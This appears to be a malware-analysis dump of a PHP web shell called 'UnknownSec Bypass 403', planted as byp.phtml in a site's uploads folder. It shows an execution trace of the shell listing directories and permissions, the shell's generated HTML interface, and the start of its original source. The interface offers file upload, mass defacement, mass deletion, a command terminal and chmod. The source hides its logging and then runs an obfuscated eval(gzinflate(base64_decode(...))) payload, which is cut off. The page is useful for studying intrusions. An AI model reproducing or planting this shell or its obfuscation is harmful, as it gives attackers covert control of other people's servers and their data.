2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 163 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 164 $id = 0
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 166 $a = TRUE
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 164 $id = 1
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i = 0
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 164 $id = 2
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i = 0
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 164 $id = 3
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i = 0
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 164 $id = 4
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i = 0
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 172 $i++
3 20 0 0.002490 558696 p 1 /var/www/html/uploads/byp.phtml(9) : eval()'d code 178 1 '/var/www/html/uploads'
4 21 0 0.002504 558696 fileperms 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 1 '/var/www/html/uploads'
4 21 1 0.002522 558760
4 21 R 16895
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 $p = 16895
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 114 $i = 'd'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 122 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 123 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 126 $i .= 'x'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 127 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 128 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 131 $i .= 'x'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 132 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 133 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 136 $i .= 'x'
3 20 1 0.002654 558760
3 20 R 'drwxrwxrwx'
3 22 0 0.002669 558760 ▟ 1 /var/www/html/uploads/byp.phtml(9) : eval()'d code 178 2 '/var/www/html/uploads' 'drwxrwxrwx'
4 23 0 0.002684 558760 getcwd 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 21 0
4 23 1 0.002698 558808
4 23 R '/var/www/html/uploads'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 21 $▚ = '/var/www/html/uploads'
4 24 0 0.002724 558808 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 23 1 '/var/www/html/uploads'
4 24 1 0.002743 558848
4 24 R TRUE
3 22 1 0.002757 558824
3 22 R '<font color=\'green\'>drwxrwxrwx</font>'
3 25 0 0.002775 558720 getcwd 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 196 0
3 25 1 0.002789 558768
3 25 R '/var/www/html/uploads'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 196 $dir = '/var/www/html/uploads'
3 26 0 0.002814 558768 str_replace 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 198 3 '\\' '/' '/var/www/html/uploads'
3 26 1 0.002830 558864
3 26 R '/var/www/html/uploads'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 198 $dir = '/var/www/html/uploads'
3 27 0 0.002855 558768 explode 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 199 2 '/' '/var/www/html/uploads'
3 27 1 0.002870 559344
3 27 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 199 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 200 $i = 0
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 200 $i++
3 28 0 0.002931 559272 scandir 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 614 1 '/var/www/html/uploads'
3 28 1 0.002964 559896
3 28 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'byp.phtml', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 614 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'byp.phtml', 4 => 'data', 5 => 'prepend.php']
3 29 0 0.003004 559864 getcwd 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 615 0
3 29 1 0.003017 559912
3 29 R '/var/www/html/uploads'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 615 $pa = '/var/www/html/uploads'
3 30 0 0.003044 559912 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 1 '/var/www/html/uploads/.'
3 30 1 0.003061 559952
3 30 R 1676249448
3 31 0 0.003075 559864 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 2 'Y-m-d' 1676249448
3 31 1 0.003130 562256
3 31 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 $dt = '2023-02-12'
3 32 0 0.003158 562232 is_dir 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 630 1 '/var/www/html/uploads/.'
3 32 1 0.003173 562272
3 32 R TRUE
3 33 0 0.003187 562240 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 1 '/var/www/html/uploads/..'
3 33 1 0.003204 562288
3 33 R 1676249448
3 34 0 0.003218 562192 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 2 'Y-m-d' 1676249448
3 34 1 0.003249 562520
3 34 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 $dt = '2023-02-12'
3 35 0 0.003273 562248 is_dir 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 630 1 '/var/www/html/uploads/..'
3 35 1 0.003287 562288
3 35 R TRUE
3 36 0 0.003300 562248 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 1 '/var/www/html/uploads/.htaccess'
3 36 1 0.003316 562288
3 36 R 1676249448
3 37 0 0.003330 562192 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 2 'Y-m-d' 1676249448
3 37 1 0.003366 562520
3 37 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 $dt = '2023-02-12'
3 38 0 0.003390 562248 is_dir 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 630 1 '/var/www/html/uploads/.htaccess'
3 38 1 0.003404 562288
3 38 R FALSE
3 39 0 0.003418 562248 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 1 '/var/www/html/uploads/byp.phtml'
3 39 1 0.003434 562288
3 39 R 1676249448
3 40 0 0.003447 562192 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 2 'Y-m-d' 1676249448
3 40 1 0.003477 562520
3 40 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 $dt = '2023-02-12'
3 41 0 0.003501 562248 is_dir 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 630 1 '/var/www/html/uploads/byp.phtml'
3 41 1 0.003516 562288
3 41 R FALSE
3 42 0 0.003529 562248 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 1 '/var/www/html/uploads/data'
3 42 1 0.003545 562288
3 42 R 1676249448
3 43 0 0.003558 562192 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 2 'Y-m-d' 1676249448
3 43 1 0.003588 562520
3 43 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 $dt = '2023-02-12'
3 44 0 0.003611 562248 is_dir 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 630 1 '/var/www/html/uploads/data'
3 44 1 0.003625 562288
3 44 R TRUE
3 45 0 0.003638 562248 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 637 1 '/var/www/html/uploads/data'
3 45 1 0.003656 562288
3 45 R TRUE
3 46 0 0.003670 562248 p 1 /var/www/html/uploads/byp.phtml(9) : eval()'d code 639 1 '/var/www/html/uploads/data'
4 47 0 0.003683 562248 fileperms 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 1 '/var/www/html/uploads/data'
4 47 1 0.003697 562288
4 47 R 16895
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 $p = 16895
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 114 $i = 'd'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 122 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 123 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 126 $i .= 'x'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 127 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 128 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 131 $i .= 'x'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 132 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 133 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 136 $i .= 'x'
3 46 1 0.003826 562288
3 46 R 'drwxrwxrwx'
3 48 0 0.003840 562248 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 640 1 '/var/www/html/uploads/data'
3 48 1 0.003857 562288
3 48 R TRUE
3 49 0 0.003872 562256 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 1 '/var/www/html/uploads/prepend.php'
3 49 1 0.003888 562304
3 49 R 1676249448
3 50 0 0.003902 562200 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 2 'Y-m-d' 1676249448
3 50 1 0.003933 562528
3 50 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 629 $dt = '2023-02-12'
3 51 0 0.003958 562264 is_dir 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 630 1 '/var/www/html/uploads/prepend.php'
3 51 1 0.003972 562304
3 51 R FALSE
3 52 0 0.003986 562248 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 1 '/var/www/html/uploads/.'
3 52 1 0.004002 562272
3 52 R 1676249448
3 53 0 0.004016 562184 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 2 'Y-m-d' 1676249448
3 53 1 0.004053 562512
3 53 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 $ft = '2023-02-12'
3 54 0 0.004080 562488 is_file 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 662 1 '/var/www/html/uploads/.'
3 54 1 0.004094 562528
3 54 R FALSE
3 55 0 0.004107 562496 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 1 '/var/www/html/uploads/..'
3 55 1 0.004127 562544
3 55 R 1676249448
3 56 0 0.004141 562448 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 2 'Y-m-d' 1676249448
3 56 1 0.004172 562776
3 56 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 $ft = '2023-02-12'
3 57 0 0.004197 562504 is_file 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 662 1 '/var/www/html/uploads/..'
3 57 1 0.004211 562544
3 57 R FALSE
3 58 0 0.004224 562504 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 1 '/var/www/html/uploads/.htaccess'
3 58 1 0.004240 562544
3 58 R 1676249448
3 59 0 0.004253 562448 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 2 'Y-m-d' 1676249448
3 59 1 0.004284 562776
3 59 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 $ft = '2023-02-12'
3 60 0 0.004308 562504 is_file 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 662 1 '/var/www/html/uploads/.htaccess'
3 60 1 0.004323 562544
3 60 R TRUE
3 61 0 0.004336 562504 filesize 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 663 1 '/var/www/html/uploads/.htaccess'
3 61 1 0.004350 562544
3 61 R 64
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 663 $s = 0.0625
3 62 0 0.004375 562448 round 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 664 2 0.0625 3
3 62 1 0.004389 562520
3 62 R 0.063
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 664 $s = 0.063
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 668 $s = '0.063 KB'
3 63 0 0.004427 562544 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 676 1 '/var/www/html/uploads/.htaccess'
3 63 1 0.004444 562584
3 63 R FALSE
3 64 0 0.004458 562544 is_readable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 677 1 '/var/www/html/uploads/.htaccess'
3 64 1 0.004474 562584
3 64 R TRUE
3 65 0 0.004487 562544 p 1 /var/www/html/uploads/byp.phtml(9) : eval()'d code 678 1 '/var/www/html/uploads/.htaccess'
4 66 0 0.004501 562544 fileperms 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 1 '/var/www/html/uploads/.htaccess'
4 66 1 0.004515 562584
4 66 R 33188
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 $p = 33188
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 110 $i = '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 122 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 123 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 126 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 127 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 128 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 131 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 132 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 133 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 136 $i .= '-'
3 65 1 0.004642 562584
3 65 R '-rw-r--r--'
3 67 0 0.004656 562544 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 679 1 '/var/www/html/uploads/.htaccess'
3 67 1 0.004673 562584
3 67 R FALSE
3 68 0 0.004686 562544 is_readable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 679 1 '/var/www/html/uploads/.htaccess'
3 68 1 0.004703 562584
3 68 R TRUE
3 69 0 0.004721 562656 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 1 '/var/www/html/uploads/byp.phtml'
3 69 1 0.004737 562696
3 69 R 1676249448
3 70 0 0.004750 562600 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 2 'Y-m-d' 1676249448
3 70 1 0.004781 562928
3 70 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 $ft = '2023-02-12'
3 71 0 0.004806 562656 is_file 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 662 1 '/var/www/html/uploads/byp.phtml'
3 71 1 0.004820 562696
3 71 R TRUE
3 72 0 0.004833 562656 filesize 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 663 1 '/var/www/html/uploads/byp.phtml'
3 72 1 0.004846 562696
3 72 R 7346
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 663 $s = 7.173828125
3 73 0 0.004876 562560 round 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 664 2 7.173828125 3
3 73 1 0.004891 562632
3 73 R 7.174
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 664 $s = 7.174
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 668 $s = '7.174 KB'
3 74 0 0.004929 562656 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 676 1 '/var/www/html/uploads/byp.phtml'
3 74 1 0.004946 562696
3 74 R FALSE
3 75 0 0.004959 562656 is_readable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 677 1 '/var/www/html/uploads/byp.phtml'
3 75 1 0.004974 562696
3 75 R TRUE
3 76 0 0.004988 562656 p 1 /var/www/html/uploads/byp.phtml(9) : eval()'d code 678 1 '/var/www/html/uploads/byp.phtml'
4 77 0 0.005000 562656 fileperms 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 1 '/var/www/html/uploads/byp.phtml'
4 77 1 0.005015 562696
4 77 R 33204
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 $p = 33204
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 110 $i = '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 122 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 123 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 126 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 127 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 128 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 131 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 132 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 133 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 136 $i .= '-'
3 76 1 0.005159 562696
3 76 R '-rw-rw-r--'
3 78 0 0.005173 562656 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 679 1 '/var/www/html/uploads/byp.phtml'
3 78 1 0.005190 562696
3 78 R FALSE
3 79 0 0.005204 562656 is_readable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 679 1 '/var/www/html/uploads/byp.phtml'
3 79 1 0.005220 562696
3 79 R TRUE
3 80 0 0.005234 562656 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 1 '/var/www/html/uploads/data'
3 80 1 0.005250 562696
3 80 R 1676249448
3 81 0 0.005264 562600 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 2 'Y-m-d' 1676249448
3 81 1 0.005295 562928
3 81 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 $ft = '2023-02-12'
3 82 0 0.005320 562656 is_file 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 662 1 '/var/www/html/uploads/data'
3 82 1 0.005333 562696
3 82 R FALSE
3 83 0 0.005346 562664 filemtime 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 1 '/var/www/html/uploads/prepend.php'
3 83 1 0.005362 562712
3 83 R 1676249448
3 84 0 0.005376 562608 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 2 'Y-m-d' 1676249448
3 84 1 0.005406 562936
3 84 R '2023-02-12'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 661 $ft = '2023-02-12'
3 85 0 0.005430 562672 is_file 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 662 1 '/var/www/html/uploads/prepend.php'
3 85 1 0.005445 562712
3 85 R TRUE
3 86 0 0.005458 562672 filesize 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 663 1 '/var/www/html/uploads/prepend.php'
3 86 1 0.005480 562712
3 86 R 57
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 663 $s = 0.0556640625
3 87 0 0.005509 562568 round 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 664 2 0.0556640625 3
3 87 1 0.005525 562640
3 87 R 0.056
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 664 $s = 0.056
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 668 $s = '0.056 KB'
3 88 0 0.005563 562672 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 676 1 '/var/www/html/uploads/prepend.php'
3 88 1 0.005580 562712
3 88 R FALSE
3 89 0 0.005594 562672 is_readable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 677 1 '/var/www/html/uploads/prepend.php'
3 89 1 0.005610 562712
3 89 R TRUE
3 90 0 0.005623 562672 p 1 /var/www/html/uploads/byp.phtml(9) : eval()'d code 678 1 '/var/www/html/uploads/prepend.php'
4 91 0 0.005641 562672 fileperms 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 1 '/var/www/html/uploads/prepend.php'
4 91 1 0.005656 562712
4 91 R 33261
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 104 $p = 33261
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 110 $i = '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 122 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 123 $i .= 'w'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 126 $i .= 'x'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 127 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 128 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 131 $i .= 'x'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 132 $i .= 'r'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 133 $i .= '-'
3 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 136 $i .= 'x'
3 90 1 0.005795 562712
3 90 R '-rwxr-xr-x'
3 92 0 0.005809 562672 is_writable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 679 1 '/var/www/html/uploads/prepend.php'
3 92 1 0.005827 562712
3 92 R FALSE
3 93 0 0.005840 562672 is_readable 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 679 1 '/var/www/html/uploads/prepend.php'
3 93 1 0.005856 562712
3 93 R TRUE
3 94 0 0.005870 562608 date 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 706 1 'Y'
3 94 1 0.005901 562896
3 94 R '2023'
2 13 1 0.005917 562608
1 3 1 0.005932 480728
0.005958 387240
TRACE END [2023-02-12 22:51:14.432592]
Generated HTML code
<html><head>
<meta name="author" content="UnknownSec">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>localhost - UnknownSec 403</title>
<meta name="viewport" content="width=device-width, initial-scale=0.70, user-scalable=no">
<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style.css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js"></script>
</head>
<body class="bg-secondary text-light">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<a class="text-decoration-none text-light" href="/byp.phtml"><h4>UnknownSec Bypass <i class="bi bi-bug-fill"></i> 403</h4></a><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a><a class="text-decoration-none" href="?path=/var">var</a>/<a class="text-decoration-none" href="?path=/var/www">www</a>/<a class="text-decoration-none" href="?path=/var/www/html">html</a>/ [ <font color="green">drwxrwxrwx</font> ]
<div class="dropdown">
<button class="btn btn-outline-light dropdown-toggle btn-sm" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="bi bi-menu-down"></i> Menu</button>
<div class="dropdown-menu">
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=upload"><i class="bi bi-upload"></i> Upload</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=depes"><i class="bi bi-exclamation-diamond"></i> Mass depes</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=delete"><i class="bi bi-trash"></i> Mass delete</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=cmd"><i class="bi bi-terminal"></i> Terminal</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=info"><i class="bi bi-info-circle"></i> Info server</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=about"><i class="bi bi-info"></i> About</a>
</div>
</div><div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Last edit</td>
<td class="text-center">Size</td>
<td class="text-center">Permission</td>
<td class="text-center">Options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>2023-02-12</center></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-select form-select-sm" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input class="btn btn-outline-light btn-sm" type="submit" value="Go">
</div></form>
</td>
</tr>
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/byp.phtml&path=/var/www/html">byp.phtml</a></td>
<td><center>2023-02-12</center></td>
<td><center>7.174 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-select form-select-sm" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="byp.phtml">
<input type="hidden" name="path" value="/var/www/html/byp.phtml">
<input class="btn btn-outline-light btn-sm" type="submit" value="Go">
</div></form>
</td>
</tr>
</tbody>
</table>
<div class="text-center">
<kbd>Copyright © 2023 - UnknownSec</kbd>
</div>
</div>
</div>
</div>
</div>
<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
</body></html>Original PHP code
<?php
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
eval(gzinflate(base64_decode('7TztcttGkr/pKr/DBMUzyFoRkGxlnZJIZh1LclxnWy5LuWzKcrFAYEjCxNcCoCWuo32M1Nbuj323PMl2T88AAxCkaMvxxnf3wxYw058zPT3dPQO2f/3ln2zAzB+ieRRfRmfcNQ/v3mn/+svfodXoZ/ky4MPcGQf8vednSeAsD6I44ofXfZv6DAC/e8efdPws43mnPXpyfP7ajJPcjyPzTZfdu8fao5enZ9RovmED4OYBqyB2PLP7/u6d1ow7Hk875uM4ynmU9/Jlwg9Yzq9yGxj6kdk9bIA6AnHizEc+B8zJc8edhdB+yCZ+wCMn5APDtBRrfDffWKYhaHF3FncQbDTl+cglgllHASdOPgPRBeSVn3fw4VpqiQihM/Xd0V8Wcc6z0TRxO12hxiROOQghyTAnY+05Xw6G7XdOsOACpCVZYAeMBMvy1E+ywMlmHNgTHOp6LRlOFpGLCrJff/lXp+356U476bL3KAmrDriSGTtbMH3/AOqVLtSB8SDjOgRo4156SkEiOrpMfTHhHQSSFFOeL9IIDGICg8XcOIjTgTlNOY/MoWG1E8vo29glzEHj04iXcq8Ba1Vpz/2/p7OfdKQ+fgIWBGsF1yNKCXLz6F3H/P78/OXo8bOnxy/OR09fmt2uBrwOBi0ZxSMDLkH+PDo5ffXjo1dHx0f4tIHYCuQWJLcjt57UtrJtKdk2cm2W6tXx89Pz49Gjo6M14lQAJAF9Lp++ZLnvOXPm+XPwUYGPkyvtRQAd1u2BzzOOFsGQjBt66JUvZ7ET+sJ+2hIZWuk9XuTJIi/fQ57PYu9RmjpLaHTwrzD9lm3zKw6uq06E1UkIMGS9o7rggTAEIbRN8GPgczuy//Uu+P0h2x